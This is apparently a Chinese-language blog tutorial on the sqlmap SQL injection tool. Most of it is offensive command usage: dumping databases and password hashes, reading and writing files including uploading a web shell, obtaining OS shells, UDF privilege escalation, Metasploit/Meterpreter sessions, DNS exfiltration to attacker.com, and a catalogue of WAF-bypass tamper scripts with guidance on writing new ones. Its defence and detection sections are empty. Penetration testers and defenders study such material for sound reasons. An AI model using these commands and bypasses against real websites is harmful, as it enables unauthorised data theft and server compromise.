Sqlmap 使用 Python 語言開發，原來用的 Python2 新版本 1.5 使用 Python3，分析使用的也是 1.5 版本

• 專案地址：https://github.com/sqlmapproject/sqlmap
• 中文檔案：https://sqlmap.campfire.ga
• 閱讀檔案是發現的一個有趣的專案：中文檔案撰寫指北，https://github.com/mzlogin/chinese-copywriting-guidelines

Sqlmap 具有以下功能

• 識別有漏洞的引數
• 針對有漏洞的引數，自動選取對應型別的 SQL 注入技術
• 識別后端 DBMS 的相關指紋資訊
• 根據用戶使用的選項，它還能采集盡可能多的指紋資訊，拉取資料或是掌管整個資料庫服務器

之后會對這些功能原理進行分析

使用篇

基礎命令

1. 判斷網址有無SQL注入漏洞

   sqlmap -u "?址"
   

   結束以后會得到該?站的資料庫、作業系統、服務器等版本資訊

2. 如果存在漏洞可以使用以下命令注出當前網站下所有資料庫名

   sqlmap -u "?址" --dbs
   

3. 注出指定資料庫下的所有表名

   sqlmap -u "?址" -D 資料庫名 --tables
   

4. 注出指定資料庫指定表下所有列資訊

   sqlmap -u "?址" -D 資料庫名 -T 表名 --columns
   

5. 注出所有指定列資料

   sqlmap -u "?址" -D 資料庫名 -T 表名 -C 列名 --dump
   

   在任意環節使用--dumps，可以將所有資料注出，如指定資料庫使用，注出所有資料庫下的所有表的所有欄位資訊

   python3 .\sqlmap.py -u "http://127.0.0.1:8888/Less-2/?id=1" -D test --dump
   

   --batch命令可以自動跳過選擇項，按默認選項注入

進階命令

此部分參考 sqlmap 手冊，在手冊基礎上進行了精煉

輸出資訊的詳細程度

-v	#共7個級別(0~6)，默認為1
#可以用 -vv 代替 -v 2，推薦使用這種方法

• 0：只輸出 Python 出錯回溯資訊，錯誤和關鍵資訊
• 1：增加輸出普通資訊和警告資訊
• 2：增加輸出除錯資訊
• 3：增加輸出已注入的 payloads
• 4：增加輸出 HTTP 請求
• 5：增加輸出 HTTP 回應頭
• 6：增加輸出 HTTP 回應內容

目標

-d	#直連資料庫，"mysql://root:root@192.168.0.8:3306/testdb"
-u URL
-l	#從Burp代理日志檔案中決議目標地址
-m	#從文本檔案中批量獲取目標
-r	#從檔案中讀取 HTTP 請求
-g	#使用 Google dork 結果作為目標地址 python sqlmap.py -g "inurl:\".php?id=1\""
-c	#從 INI 組態檔中讀取選項

--purge			#清除歷史快取
--flush-session	#清除上次掃描的快取

注：-d是一個一個新的開關選項，它允許你通過 DBMS 守護行程監聽的 TCP 埠直接連接目標資料庫服務器，便于使用 SQL 注入技術對目標資料庫進行攻擊

指定連接時資訊

指定連接目標地址的方式

--method=METHOD		#強制使用提供的 HTTP 方法（例如：PUT）
--data=DATA			#使用 POST 發送資料串；--data="id=1&user=admin"
--param-del=";"		#使用引數分隔符，--data="id=1;user=admin"
--cookie=COOKIE		#指定 HTTP Cookie ，--cookie "id=11" --level 2
--drop-set-cookie	#忽略 HTTP 回應中的 Set-Cookie 引數
--user-agent=AGENT	#指定 HTTP User-Agent
--random-agent		#使用隨機的 HTTP User-Agent，隨機從 ./txt/user-agents.txt 選一個，不是每次請求換一個
--host				#手動設定 HTTP Host 請求頭值，默認情況下，HTTP Host 請求頭從提供的目標 URL 中決議
--referer=REFERER	#指定 HTTP Referer，默認情況下不會在 HTTP 請求中發送 HTTP Referer 請求頭
-H HEADER			#設定額外的 HTTP 頭引數（例如："X-Forwarded-For: 127.0.0.1"）
--headers=HEADERS	#設定額外的 HTTP 頭引數,必須以換行符分隔（例如："Accept-Language: fr\nETag: 123"）
--auth-type，--auth-cred #選項用于指定后端 Web 服務器實作的 HTTP 協議認證和所有向目標程式發起 HTTP 請求的有效憑據，支持的三種 HTTP 協議認證機制是：Basic、Digest、NTLM，認證憑據的語法是 username:password，一個符合語法的例子：$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/basic/get_int.php?id\=1" --auth-type Basic --auth-cred "testuser:testpass"
--auth-file			#HTTP 協議私鑰認證
--ignore-code		#忽略（有問題的）HTTP 錯誤碼
--proxy，--proxy-cred，--proxy-file 和 --ignore-proxy	#HTTP(S) 代理，--proxy 并提供 HTTP(S) 代理地址使 HTTP(S) 請求經過該代理到達目標 URL，設定 HTTP(S) 代理的語法是 http://url:port，如果 HTTP(S) 代理需要身份驗證，則可以對選項 --proxy-cred 使用 username:password 格式添加對應的憑證可以使用選項 --proxy-file 并指定包含批量代理的檔案，想要使用 sqlmap 對本地局域網目標進行測驗時應該使用開關 --ignore-proxy 來繞過系統級的 HTTP(S) 代理服務
--delay=10			#設定每個 HTTP 請求的延遲秒數
--safe-freq=SAFE	 #每訪問兩次給定的合法 URL 才發送一次測驗請求
--csrf-token 和 --csrf-url	#繞過反 CSRF 防護
-force-ssl			#支持https的SQL注入只需加入引數-force-ssl告訴sqlmap這是http服務即可
--identify-waf		#檢測是否有WAF/IPS/IDS，這個功能以失效
--eval				#在每個請求期間運行自定義的 Python 代碼

指定注入引數

以下選項用于指定要測驗的引數

提供自定義注入 payloads 和篡改引數的腳本

-p TESTPARAMETER	#指定需要測驗的引數
--skip=SKIP			#指定要跳過的引數
--dbms=DBMS			#指定 DBMS 型別（例如：MySQL）
--os=OS				#指定 DBMS 服務器的作業系統型別
--prefix=PREFIX		 #注入 payload 的前綴字串
--suffix=SUFFIX		 #注入 payload 的后綴字串
--tamper=TAMPER		 #用給定腳本修改注入資料
--batch				# 自動跳過選擇項，按默認選項注入

指定檢測級別

sqlmap 使用的 payloads 直接從文本檔案 xml/payloads.xml 中載入，

根據該檔案頂部的相關指導說明進行設定，如果 sqlmap 漏過了特定的注入，

你可以選擇自己修改指定的 payload 用于檢測，

level有5級，越高檢測越全，默認為 1

–level 1 檢測Get和Post

–level 2 檢測HTTP Cookie

–level 3 檢測User-Agent和Referer

–level 4 檢測

–level 5 檢測 HOST 頭

risk有3級，級別越高風險越大，默認為1

–risk 2 會在默認的檢測上添加大量時間型盲注陳述句測驗

–risk 3 會在原基礎上添加OR 型別的布爾型盲注 ，可能會update導致修改資料庫

頁面對比

選項：--string，--not-string，--regexp 和 --code

默認區分一個 True 查詢和 False 查詢（布爾型盲注背后的相關理念概念）是通過對比注入前后回傳的結果頁面是否一致進行判斷的

不過這個參照方法并不一定有效，因為可能就算沒有進行注入，頁面內容也會進行相應更新，例如：頁面上有計數器、動態的廣告橫幅、或者任何基于時間而非用戶輸入內容進行動態渲染的內容，為了避免類似的情況，sqlmap 會盡可能嘗試識別出對應的代碼段所回傳的請求內容并做好相關的處理

如果用戶知道可以通過 HTTP 狀態碼區分 True 查詢和 False 查詢（例如：200 對應 True，401 對應 False），那么可以向 sqlmap 提供對應的資訊，（例如：--code=200）

開關：--text-only 和 --titles

如果用戶知道可以通過 HTML 標題區分 True 查詢和 False 查詢（例如：Welcome 對應 True，Forbidden 對應 False），那么可以使用 --titles 開啟基于標題對比的開關

如果 HTTP 回應報文中存在無效資訊（例如：腳本、嵌套元素等），可以通過過濾頁面的內容（開關 --text-only）而只獲取文本內容，通過這種方式，大多數情況下，這樣會自動調優檢測引擎

指定注入型別

以下選項用于調整特定 SQL 注入技術的測驗方法

--technique=TECH	#使用的 SQL 注入技術（默認為“BEUSTQ”)
B: Boolean-based blind SQL injection（布爾型盲注）
E: Error-based SQL injection（報錯型注入）
U: UNION query SQL injection（聯合查詢注入）
S: Stacked queries SQL injection（堆查詢注入）
T: Time-based blind SQL injection（時間型盲注）
Q: inline Query injection（行內查詢注入）
# 例如，如果僅測驗利用報錯型注入和堆疊查詢注入，你可以提供 ES

--time-sec=TIMESEC  #設定延時注入的時間（默認為 5）
--second-order=S..  #設定二階回應的結果顯示頁面的 URL（該選項用于二階 SQL 注入）
--dns-domain		#DNS 滲出攻擊
# 如果用戶正控制著一臺注冊為 DNS 域名服務器的主機（例如：域名 attacker.com），則可以使用該選項（例如：--dns-domain attacker.com）來啟用此攻擊，它的前提條件是使用 Administrator（即管理員）權限（因為需要使用特權埠 53）運行 sqlmap，這時可以使用常用的（盲注）技術來進行攻擊，如果已經識別出一種有效攻擊方式（最好是時間型盲注），則這種攻擊能夠加速獲取資料的程序，如果報錯型注入或聯合查詢注入技術可用，則默認情況下將跳過 DNS 滲出攻擊測驗

列舉資訊

以下選項用于獲取資料庫的資訊，結構和資料表中的資料，

-a, --all          #獲取所有資訊、資料
-f, --fingerprint	#采用特定 SQL 方言或者內帶特定錯誤資訊等技術展開詳細的 DBMS 指紋識別
-b, --banner        #獲取 DBMS banner,回傳資料庫的版本號
--current-user			#獲取 DBMS 當前用戶
--current-db			#獲取 DBMS 當前資料庫
--hostname				#獲取 DBMS 服務器的主機名
--is-dba				#探測 DBMS 當前用戶是否為 DBA（資料庫管理員）
--users					#列舉出 DBMS 所有用戶
--passwords				#列舉出 DBMS 所有用戶的密碼哈希
--privileges			#列舉出 DBMS 所有用戶特權級
--roles					#列舉出 DBMS 所有用戶角色

--dbs					#列舉出 DBMS 所有資料庫
--tables				#列舉出 DBMS 資料庫中的所有表，--exclude-sysdbs 以排除所有的系統資料庫，對于 Oracle，你需要提供 TABLESPACE_NAME 而不是資料庫名稱
--columns				#列舉出 DBMS 表中的所有列，對于 PostgreSQL，你需要提供 public 或系統資料庫的名稱，這是因為不可能列舉其他資料庫表，只能列舉出 Web 應用程式用戶連接到的資料庫模式下的表，它們總是以 public 為別名
--schema				#列舉出 DBMS 所有模式
--count					#獲取資料表數目
--dump-all				#如果當前會話用戶的讀取權限允許，可以一次匯出所有資料庫表條目
--dump					#匯出 DBMS 資料庫表項
--search，-C，-T，-D		#此開關允許你在所有資料庫中搜索特定的資料庫名和表名，在特定的資料表中搜索特定的列名
--stop 10				#只取前10行資料
    
-D DB					#指定要列舉的 DBMS 資料庫
-T TBL					#指定要列舉的 DBMS 資料表
-C COL					#指定要列舉的 DBMS 資料列
    
--sql-query=QUERY		#指定要執行的 SQL 陳述句
--sql-shell				#調出互動式 SQL shell

用例

指定資料包注入

• 從檔案讀取HTTP請求，GET和POST都可以

  sqlmap -r "burp.txt" -p "username"	#-p 指定存在注入的引數
  

  這里的 txt 檔案就是完整的 http 請求包，可以使用 -p 指定引數，也可以在 txt 檔案中使用 *（星號）定位，特別是注入點后需要使用閉合陳述句的情況下

• Cookie注入

  sqlmap -u "http://www.vuln.com" --cookie "id=11" --level 2
  

• 當防火墻對請求速度做了限制

  sqlmap -u "http://www.vuln.com/post.php?id=1" --delay=10
  # 在每個HTTP請求之間的延遲10秒
  

偽靜態注入

sqpmap  -u http://victim.com/id/666*.html --dbs  #在html擴展名前加個'*'

暴力破解

當資料庫為以下情況時，需要暴力破解表名和列名

• DBMS（Database Management System，資料庫管理系統）是 < 5.0 版本的 MySQL，它們不具備 information_schema
• DBMS 是微軟的 Access 資料庫，并且其中的系統表 MSysObjects 默認設定不可讀
• 當前會話用戶對 DBMS 中存盤資料表定義的系統表沒有讀權限

暴力破解表名

只要開啟了 --common-tables，sqlmap 仍然可以識別出部分系統資料表，sqlmap 會嘗試對系統表進行暴力破解，試圖找出 DBMS 中存在的常見資料表，常見的資料表名串列存盤在 txt/common-tables.txt，支持用戶進行任意修改

python sqlmap.py -u "http://192.168.136.129/mysql/get_int_4.php?id=1" --common-tables -D testdb

暴力破解列名

開啟了 --columns 開關，sqlmap 則會提示你是否使用暴力破解技術，因而，就算出現上面兩個場景之一，只要你開啟了 --common-columns，sqlmap 仍然可以識別出部分系統資料表，sqlmap 會嘗試對系統表進行暴力破解，試圖找出 DBMS 中存在的常見資料表列名，常見的資料表名串列存盤在 txt/common-columns.txt，支持用戶進行任意修改

檔案操作

僅對MySQL、MSSQL、PostgreSQL有效，可以進行檔案操作

前提：

• 資料庫用戶有讀寫權限
• 有目錄讀寫檔案權限

sqlmap -u url --is-dba
#查看是否dba權限,必須為root權限

sqlmap -u url --file-read "C:/Windows/win.ini"		
#讀取檔案

sqlmap -u url --file-write=D:/shell.php --file-dest=C:/www/shell.php
#上傳檔案 (本地木馬路徑:目標網站目錄)

執行命令

僅對MySQL、MSSQL、PosgreSQL有效

前提：

• 資料庫用戶有讀寫權限
• 有目錄讀寫檔案權限

sqlmap 能夠在資料庫所在服務器的作業系統上運行任意的命令

sqlmap -u "URL" --os-shell	#獲取系統互動shell或--os-cmd=id執行系統命令

原理就是上傳一個 upload 木馬后，再上傳一個cmd shell

當 --os-shell退出后， 會呼叫后門腳本洗掉上傳檔案后，進行自洗掉

• 在 MySQL 和 PostgreSQL 中，sqlmap 可以上傳一個包含兩個用戶自定義函式

  分別為 sys_exec() 和 sys_eval() 的共享庫（二進制檔案），然后在資料庫中創建出兩個對應函式，并呼叫對應函式執行特定的命令，并允許用戶選擇是否列印出相關命令執行的結果，

• 在 Microsoft SQL Server 中，sqlmap 會利用 xp_cmdshell 存盤程序：

  如果該存盤程序被關閉了（Microsoft SQL Server 的 2005 及以上版本默認關閉），sqlmap 則會將其重新打開；如果該存盤程序不存在，sqlmap 則會重新創建它，當用戶請求標準輸出，sqlmap 將使用任何可用的 SQL 注入技術（盲注、帶內注入、報錯型注入）去獲取對應結果，相反，如果無需標準輸出對應結果，sqlmap 則會使用堆疊查詢注入（Stacked queries）技術執行相關的命令，

• 如果堆疊查詢沒有被 Web 應用識別出來，并且 DBMS 為 MySQL，假如后端 DBMS 和 Web 服務器在同一臺服務器上，則仍可以通過利用 SELECT 陳述句中的 INTO OUTFILE，在 根目錄可寫目錄中寫shell

UDF提權

可以通過編譯 MySQL 或 PostgreSQL 共享庫（在 Windows 上為 DLL，在 Linux/Unix 上為共享物件（shared object））來注入自己的用戶自定義函式（UDFs），然后將本地存盤共享庫的目錄路徑提供給 sqlmap，sqlmap 會根據你的選擇決定下一步是向資料庫服務器檔案系統上傳共享庫到還是創建用戶自定義函式，當你完成注入 UDFs 的使用后，sqlmap 還可以將它們從資料庫中洗掉

使用選項 --udf-inject 并按照說明進行操作即可；如果需要，也可以使用 --shared-lib 選項通過命令列指定共享庫的本地檔案系統路徑，否則 sqlmap 會在運行時向你詢問路徑

此功能僅對 MySQL 或 PostgreSQL 有用

有狀態帶外連接：Meterpreter & friends

開關和選項：--os-pwn，--os-smbrelay，--os-bof，--priv-esc，--msf-path 和 --tmp-path

當后端 DBMS 為 MySQL，PostgreSQL 或 Microsoft SQL Server 時，并且當前會話用戶擁有對資料庫特定功能和架構缺陷的利用權限時，sqlmap 能夠在攻擊者機器與資料庫服務器之間建立起有狀態帶外 TCP 連接，根據用戶的選擇，該連接可以是互動式命令列、Meterpreter 會話、或者圖形用戶界面（VNC）會話

sqlmap 依賴 Metasploit 創建 shellcode，并實作了四種不同的技術在資料庫服務器上執行它，這些技術分別是：

• 通過 sqlmap 的用戶自定義函式 sys_bineval() 在資料庫記憶體中執行 Metasploit shellcode，MySQL 和 PostgreSQL 支持該技術，通過開關 --os-pwn 啟用
• 通過 sqlmap 的用戶自定義函式 sys_exec() 向 MySQL 和 PostgreSQL 上傳一個 Metasploit 獨立 payload 傳輸器并執行，對于 Microsoft SQL Server 則是使用 xp_cmdshell() 函式，通過開關 --os-pwn 啟用
• 通過進行從資料庫服務器到攻擊者機器（由 Metasploit smb_relay 服務監聽）之間的 UNC 路徑請求的 SMB 反射攻擊（MS08-068）來執行 Metasploit shellcode，當 sqlmap 運行于具有高權限（uid=0）的 Linux/Unix 上，且目標 DBMS 以 Windows 管理員身份運行時支持該技術，通過開關 --os-smbrelay 啟用
• 通過利用 Microsoft SQL Server 2000 和 2005 的 sp_replwritetovarbin 存盤程序堆緩沖區溢位（MS09-004）在資料庫記憶體中執行 Metasploit shellcode，sqlmap 使用自己的 exploit，自動繞過 DEP 記憶體保護來觸發漏洞，但它依賴 Metasploit 生成 shellcode，以便在成功利用時執行，通過開關 --os-bof 啟用

訪問 Windows 注冊表

條件：

• DBMS（Database Management System，資料庫管理系統）是 MySQL，PostgreSQL 或 Microsoft SQL Server
• Web 應用程式支持堆疊查詢
• 會話用戶必須具備相應的訪問權限

--reg-read		#讀取 Windows 注冊表鍵值
--reg-add		#寫入 Windows 注冊表鍵值
--reg-del		#洗掉 Windows 注冊表項
--reg-key，--reg-value，--reg-data 和 --reg-type #注冊表輔助選項

常規選項

-s			#從已存盤（.sqlite）檔案讀取會話
#qlmap 會在專用的輸出目錄中自動為每一個目標分別建立持久會話 SQLite 檔案，該檔案會存盤用于恢復會話的所有資料，如果用戶需要指定會話檔案的具體存盤位置（例如：將所有目標的會話資料存盤在同一個位置），則可以使用這個選項
-t			#記錄 HTTP(s) 訪問資訊到文本檔案,這個選項需要一個指定文本檔案地址的引數，用于寫入 sqlmap 產生的所有 HTTP(s) 流量資訊——包括 HTTP(S) 請求 和 HTTP(S) 回應
--batch		#以非互動式模式運行,當 sqlmap 需要用戶輸入資訊時，都將會以默認引數運行
--update	#更新 sqlmap
--flush-session #清慷訓話檔案
更多選項：
https://sqlmap.campfire.ga/usage/general

雜項：https://sqlmap.campfire.ga/usage/miscellaneous

api：https://sqlmap.campfire.ga/usage/api

Tamper腳本

此部分轉載自li qun師傅博客：https://ailiqun.xyz/2020/06/15/tamper

tamper 腳本可以用來對 sqlmap 的 sql 查詢陳述句進行一次處理，讓其繞過過濾，tamper 腳本在 sqlmap 安裝目錄的 tamper 目錄下

use age：sqlmap.py --tamper="模塊名.py"

tamper 適用的資料庫型別 & 版本

自帶tamper介紹

apostrophemask.py
功能：對引號進行 utf-8 格式編碼 (% EF% BC%87)
平臺：All
舉例：1 AND ‘1’=’1 ==> 1 AND % EF% BC%871% EF% BC%87=% EF% BC%871

apostrophenullencode.py
功能：用非法的雙 unicode 字符 (%00%27) 替換引號字符
平臺：All
舉例：1 AND ‘1’=’1 ==> 1 AND %00%271%00%27=%00%271

appendnullbyte.py
功能：在有效載荷結束位置加載零位元組字符編碼
平臺：Microsoft Access
舉例：1 AND 1=1 ==> 1 AND 1=1%00

base64encode.py
功能：用 base64 格式進行編碼
平臺：All
舉例：1’ AND SLEEP (5)# ==> MScgQU5EIFNMRUVQKDUpIw==

between.py
功能：用 between 替換大于號（>）
平臺：Mssql2005、MySQL 4/5.0/5.5、Oracle 10g、PostgreSQL 8.3/8.4/9.0
舉例：
1 AND A > B –? ==> 1 AND A NOT BETWEEN 0 AND B? –
1 AND A = B –? ==> 1 AND A BETWEEN B AND B –

bluecoat.py
功能：對 SQL 陳述句替換空格字符為 (%09)，并替換”=”—>”LIKE”
平臺：MySQL 5.1, SGOS
舉例：SELECT username FROM users WHERE id = 1 ==> SELECT%09username FROM%09users WHERE%09id LIKE 1

apostrophemask.py
功能：用 utf-8 格式編碼引號 (如：% EF% BC%87)
平臺：All
舉例：1 AND ‘1’=’1 ==> 1 AND % EF% BC%871% EF% BC%87=% EF% BC%871

charunicodeencode.py
功能：對字串進行 Unicode 格式轉義編碼
平臺：Mssql 2000,2005、MySQL 5.1.56、PostgreSQL 9.0.3 ASP/ASP.NET
舉例：SELECT FIELD%20FROM TABLE ==> % u0053% u0045% u004C% u0045% u0043% u0054% u0020% u0046% u0049% u0045% u004C% u0044% u0020% u0046% u0052% u004F% u004D% u0020% u0054% u0041% u0042% u004C% u0045

charencode.py
功能：采用 url 格式編碼 1 次
平臺：Mssql 2005、MySQL 4, 5.0 and 5.5、Oracle 10g、PostgreSQL 8.3, 8.4, 9.0
舉例：SELECT FIELD FROM%20TABLE ==> %53%45%4C%45%43%54%20%46%49%45%4C%44%20%46%52%4F%4D%20%54%41%42%4C%45

chardoubleencode.py
功能：采用 url 格式編碼 2 次
平臺：All
舉例：SELECT FIELD FROM%20TABLE ==> %2553%2545%254C%2545%2543%2554%2520%2546%2549%2545%254C%2544%2520%2546%2552%254F%254D%2520%2554%2541%2542%254C%2545

commalessmid.py
功能：將 payload 中的逗號用 from 和 for 代替，用于過濾了逗號并且是 3 個引數的情況
平臺：MySQL 5.0, 5.5
舉例：MID (VERSION (), 1, 1) ==> MID (VERSION () FROM 1 FOR 1)

concat2concatws.py
功能：CONCAT () ==> CONCAT_WS ()，用于過濾了 CONCAT () 函式的情況
平臺： MySQL 5.0
舉例：CONCAT (1,2) ==> CONCAT_WS (MID (CHAR (0),0,0),1,2)

equaltolike.py
功能：= ==> LIKE，用于過濾了等號”=” 的情況
平臺：Mssql 2005、MySQL 4, 5.0 and 5.5
舉例：SELECT * FROM users WHERE id=1 ==> SELECT * FROM users WHERE id LIKE 1

greatest.py
功能：> ==> GREATEST
平臺：MySQL 4, 5.0 and 5.5、Oracle 10g、PostgreSQL 8.3, 8.4, 9.0
舉例：1 AND A > B ==> 1 AND GREATEST (A, B+1)=A
a 和 b+1 比較，取兩者中的最大值為 a；則 a >= b+1，亦即 a > b

halfversionedmorekeywords.py
功能：空格 ==> / !0 （在關鍵字前添加注釋）
平臺：MySQL 4.0.18, 5.0.22（Mysql < 5.1）
舉例：union ==> /!0union

ifnull2ifisnull.py
功能：IFNULL (A, B) ==> IF (ISNULL (A), B, A)
平臺：MySQL 5.0 and 5.5
舉例：IFNULL (1, 2) ==> IF (ISNULL (1),2,1)

informationschemacomment.py
功能：
在 information_schema 后面加上 // ，用于繞過對 information_schema 的情況
retVal = re.sub(r”(?i)(information_schema).”, “g<1>/ /.”, payload)
平臺：All
舉例：select table_name from information_schema.tables ==> select table_name from information_schema/**/.tables

lowercase.py
功能：將 payload 里的大寫轉為小寫
平臺：Mssql 2005、MySQL 4, 5.0 and 5.5、Oracle 10g、PostgreSQL 8.3, 8.4, 9.0
舉例：SELECT table_name FROM INFORMATION_SCHEMA.TABLES ==> select table_name from information_schema.tables

modsecurityversioned.py
功能：用注釋來包圍完整的查詢陳述句，用于繞過 ModSecurity 開源 waf
平臺：MySQL 5.0
舉例：1 AND 2>1– ?==> 1 /!30874AND 2>1/–

modsecurityzeroversioned.py
功能：用注釋來包圍完整的查詢陳述句，用于繞過 waf ，和上面類似
平臺：Mysql
舉例：1 and 2>1–+ ==> 1 /!00000and 2>1/–+

multiplespaces.py
功能：圍繞 SQL 關鍵字添加多個空格
平臺：All
舉例：1 UNION SELECT foobar ==> 1   UNION   SELECT   foobar

nonrecursivereplacement.py
功能：關鍵字雙寫，可用于關鍵字過濾
平臺：All
舉例：1 UNION SELECT 2– ?==> 1 UNIONUNION SELESELECTCT 2–

overlongutf8.py
功能： 轉換給定的 payload 當中的所有字符
平臺：All
舉例：SELECT FIELD FROM TABLE WHERE 2>1 ==> SELECT% C0% AAFIELD% C0% AAFROM% C0% AATABLE% C0% AAWHERE% C0% AA2% C0% BE1

percentage.py
功能：用百分號來繞過關鍵字過濾，在關鍵字的每個字母前面都加一個 (%)
平臺：Mssql 2000, 2005、MySQL 5.1.56, 5.5.11、PostgreSQL 9.0
舉例：SELECT FIELD FROM TABLE ==> % S% E% L% E% C% T % F% I% E% L% D % F% R% O% M % T% A% B% L% E

randomcase.py
功能：將 payload 隨機大小寫
平臺：Mssql 2005、MySQL 4, 5.0 and 5.5、Oracle 10g、PostgreSQL 8.3, 8.4, 9.0
舉例：INSERT ==> InseRt

randomcomments.py
功能：在 payload 的關鍵字中間隨機插入注釋符 /**/ ，可用于繞過關鍵字過濾
平臺：Mysql
舉例：INSERT ==> I / ** / N / ** / SERT

securesphere.py
功能：在 payload 后追加特殊構造的字串
平臺：All
舉例：1 AND 1=1 ==> 1 AND 1=1 and ‘0having’=’0having’

space2comment.py
功能：用注釋符 // 代替空格，用于空格的繞過
平臺：Mssql 2005、MySQL 4, 5.0 and 5.5、Oracle 10g、PostgreSQL 8.3, 8.4, 9.0
舉例：SELECT id FROM users ==> SELECT//id//FROM//users

space2dash.py
功能：用 [注釋符 (–)+ 一個隨機字串 + 一個換行符] 替換控制符
平臺：MSSQL、 SQLite
舉例：union select 1,2–+ ==> union–HSHjsJh%0Aselect–HhjHSJ%0A1,2–+

space2hash.py
功能：用 [注釋符 (#)+ 一個隨機字串 + 一個換行符] 替換控制符
平臺：Mysql
舉例：union select 1,2–+ ==> union%23HSHjsJh%0Aselect%23HhjHSJ%0A1,2–+

space2morehash.py
功能：用多個 [注釋符 (#)+ 一個隨機字串 + 一個換行符] 替換控制符
平臺：MySQL >= 5.1.13
舉例：union select 1,2–+ ==> union %23 HSHjsJh %0A select %23 HhjHSJ %0A%23 HJHJhj %0A 1,2–+

space2mssqlblank.py
功能：用隨機的空白符替換 payload 中的空格
blanks = (‘%01’, ‘%02’, ‘%03’, ‘%04’, ‘%05’, ‘%06’, ‘%07’, ‘%08’, ‘%09’, ‘%0B’, ‘%0C’, ‘%0D’, ‘%0E’, ‘%0F’, ‘%0A’)
平臺：Mssql 2000,2005
舉例：SELECT id FROM users ==> SELECT%0Eid%0DFROM%07users

space2mssqlhash.py
功能：用 [字符# + 一個換行符] 替換 payload 中的空格
平臺：MSSQL、MySQL
舉例：union select 1,2–+ ==> union%23%0Aselect%23%0A1,2–+

space2plus.py
功能：用加號 (+) 替換空格
平臺：All
舉例：SELECT id FROM users ==> SELECT+id+FROM+users

space2randomblank.py
功能：用隨機的空白符替換 payload 中的空格
平臺：Mssql 2005、MySQL 4, 5.0 and 5.5、Oracle 10g、PostgreSQL 8.3, 8.4, 9.0
舉例：SELECT id FROM users ==> SELECT%0Did%0DFROM%0Ausers

sp_password.py
功能：在 payload 陳述句后添加 sp_password ，用于迷惑資料庫日志（Space ==> sp_password）
平臺：Mssql
舉例：1 AND 9227=9227– ?==> 1 AND 9227=9227?– sp_password

symboliclogical.py
功能：用 && 替換 and ，用 || 替換 or ，用于這些關鍵字被過濾的情況
平臺：All
舉例：
1 and 1=1 ==> 1 %26%26 1=1
1 or 1=1 ==> 1 %7c%7c 1=1

unionalltounion.py
功能：用 union select 替換 union all select
平臺：All
舉例：union all select 1,2–+ ==> union select 1,2–+

unmagicquotes.py
功能：用寬字符繞過 GPC addslashes
平臺：All
舉例：1’ and 1=1 ==> 1% df%27 and 1=1–

uppercase.py
功能：將 payload 中的小寫字母轉為大寫格式
平臺：Mssql 2005、MySQL 4, 5.0 and 5.5、Oracle 10g、PostgreSQL 8.3, 8.4, 9.0
舉例：insert ==> INSERT

varnish.py
功能：添加一個 HTTP 頭 “X-originating-IP” 來繞過 WAF
平臺：headers = kwargs.get (“headers”, {}) headers [“X-originating-IP”] = “127.0.0.1”return payload
舉例：All

versionedkeywords.py
功能：對非函式的關鍵字進行注釋
平臺：MySQL 4.0.18, 5.1.56, 5.5.11
舉例：1 union select user () ==> 1/!UNION//!SELECT/user ()

versionedmorekeywords.py
功能：對每個關鍵字進行注釋處理
平臺：MySQL 5.1.56, 5.5.11
舉例：1 union select user () ==> 1/!UNION//!SELECT/user ()

xforwardedfor.py
功能：添加一個偽造的 HTTP 頭 “X-Forwarded-For” 來繞過 WAF
平臺：All
舉例：headers = kwargs.get (“headers”, {}) headers [“X-Forwarded-For”] = randomIP () return payload

撰寫tamper

先來看一個簡單的 tamper：apostrophemask.py

# Needed imports
from lib.core.enums import PRIORITY

# Define which is the order of application of tamper scripts against
# the payload
__priority__ = PRIORITY.NORMAL

def tamper(payload, **kwargs):
    '''
    Description of your tamper script
    '''

    retVal = payload.replace('\'', "%EF%BC%87") if payload else payload

    # your code to tamper the original payload

    # return the tampered payload
    return retVal

這個 tamper 非常的簡單，寫的話參考這個就可以了，先來分析這里邊有什么元素

• import部分
• __priority__ 屬性
• dependencies函式
• tamper函式以及用戶自定義的函式

import部分

可以匯入sqlmap的內部庫，sqlmap 為我們提供了很多封裝好的函式和資料型別，比如上面的的PRIORITY就來源于sqlmap/lib/core/enums.py

priority

定義當前 tamper 的優先級，用于有多個tamper腳本的情況，有以下引數

class PRIORITY:
    LOWEST = -100
    LOWER = -50
    LOW = -10
    NORMAL = 0
    HIGH = 10
    HIGHER = 50
    HIGHEST = 100

dependencies

函式宣告該腳本適用/不適用的范圍，可以為空，比如以下代碼

# sqlmap/tamper/echarunicodeencode.py
from lib.core.common import singleTimeWarnMessage
 
def dependencies():
    singleTimeWarnMessage("tamper script '%s' is only meant to be run against ASP or ASP.NET web applications" % os.path.basename(__file__).split(".")[0])
 
# singleTimeWarnMessage() 于在控制臺中列印出警告資訊

資料庫有以下名稱，在lib\core\enums.py可以看到全部

class DBMS:
    ACCESS = "Microsoft Access"
    DB2 = "IBM DB2"
    FIREBIRD = "Firebird"
    MAXDB = "SAP MaxDB"
    MSSQL = "Microsoft SQL Server"
    MYSQL = "MySQL"
    ORACLE = "Oracle"
    PGSQL = "PostgreSQL"
    SQLITE = "SQLite"
    SYBASE = "Sybase"
    HSQLDB = "HSQLDB"
    ......

tamper函式

主要功能實作的函式，其中 payload 引數就是原始的 sqlmap的原始注入payload，我們要實作繞過，一般就是針對這個 payload 的修改

比如雙寫繞過的 payload

def tamper(payload, **kwargs):
    payload = payload.lower()
    payload = payload.replace('select','seleselectct')
    payload = payload.replace('union','ununionion')
    return payload

第二個引數：**kwargs中包含了 http 頭的資料，可以從kwargs中取出headers陣列在進行更改

比如將 http 頭中的 xff 頭變為隨機 ip

def tamper(payload, **kwargs):
	headers = kwargs.get("headers", {})
	headers["X-Forwarded-For"] = randomIP()
	return payload

代碼分析

攻防

流量分析

入侵檢測

隱蔽注入

空白部分將會在接下來的文章中添加